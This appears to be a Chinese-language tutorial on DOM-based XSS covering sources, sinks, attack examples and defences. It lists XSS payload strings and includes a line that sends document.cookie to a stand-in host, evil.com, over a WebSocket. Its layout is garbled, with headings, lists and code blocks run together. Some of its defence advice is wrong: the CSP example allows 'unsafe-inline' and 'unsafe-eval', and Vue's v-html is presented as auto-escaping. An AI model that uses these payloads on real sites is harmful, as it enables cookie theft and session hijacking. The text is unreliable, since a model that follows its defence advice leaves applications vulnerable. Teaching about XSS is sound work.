# Web網絡安全漏洞的DOM型XSS攻擊原理
## 引言
在Web應用安全領域,跨站腳本攻擊(XSS)長期位居OWASP Top 10威脅前列。其中DOM型XSS因其獨特的觸發機制和隱蔽性成為最難防御的變種之一。本文將深入剖析DOM型XSS的工作原理、攻擊場景及防御策略。
## 一、XSS攻擊類型回顧
### 1.1 傳統XSS分類
- **反射型XSS**:惡意腳本通過URL參數注入,服務器返回包含攻擊代碼的響應
- **存儲型XSS**:攻擊載荷持久化存儲在服務器端(如數據庫)
- **DOM型XSS**:完全在客戶端解析階段觸發的漏洞
### 1.2 DOM型XSS的特殊性
```mermaid
graph TD
A[用戶請求] --> B[服務器返回靜態HTML]
B --> C[瀏覽器解析DOM]
C --> D[惡意腳本操作DOM樹]
D --> E[攻擊執行]
污染源(Source):
document.URLlocation.hashdocument.referrerwindow.namepostMessage數據傳播路徑(Propagation):
// 危險示例
eval(location.hash.slice(1));
document.write(unescape(document.URL));
element.innerHTML = window.name;
觸發點(Sink):
innerHTML/outerHTMLeval()/setTimeout()location.href
https://victim.com/#<script>alert(document.cookie)</script>
location.hash:
document.getElementById('content').innerHTML = location.hash.substring(1);
<!-- 通過DOM污染改變JS行為 -->
<a id="xss" href="javascript:alert(1)"></a>
<script>
if(!window.xss) {
// 正常邏輯
} else {
xss.click(); // 觸發攻擊
}
</script>
// 使用History API繞過檢測
history.pushState({}, '', '/?<img src=x onerror=alert(1)>');
new WebSocket(`ws://evil.com/?${document.cookie}`);
// 使用DOMPurify庫
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);
Content-Security-Policy:
default-src 'self';
script-src 'unsafe-inline' 'unsafe-eval';
style-src 'self' https:;
避免危險API:
// 安全替代方案
textContent代替innerHTML
addEventListener代替on事件屬性
自動轉義模板:
<!-- Vue.js自動轉義示例 -->
<div v-html="sanitizedContent"></div>
# 測試payload生成器
payloads = [
"'\"><svg/onload=alert(1)>",
"javascript:alert(document.domain)",
"{toString:alert}"
]
postMessage未驗證originlocation.search動態生成廣告DOM型XSS的防御需要前后端協同: 1. 后端設置合適的CSP頭 2. 前端采用安全編碼規范 3. 定期進行安全審計
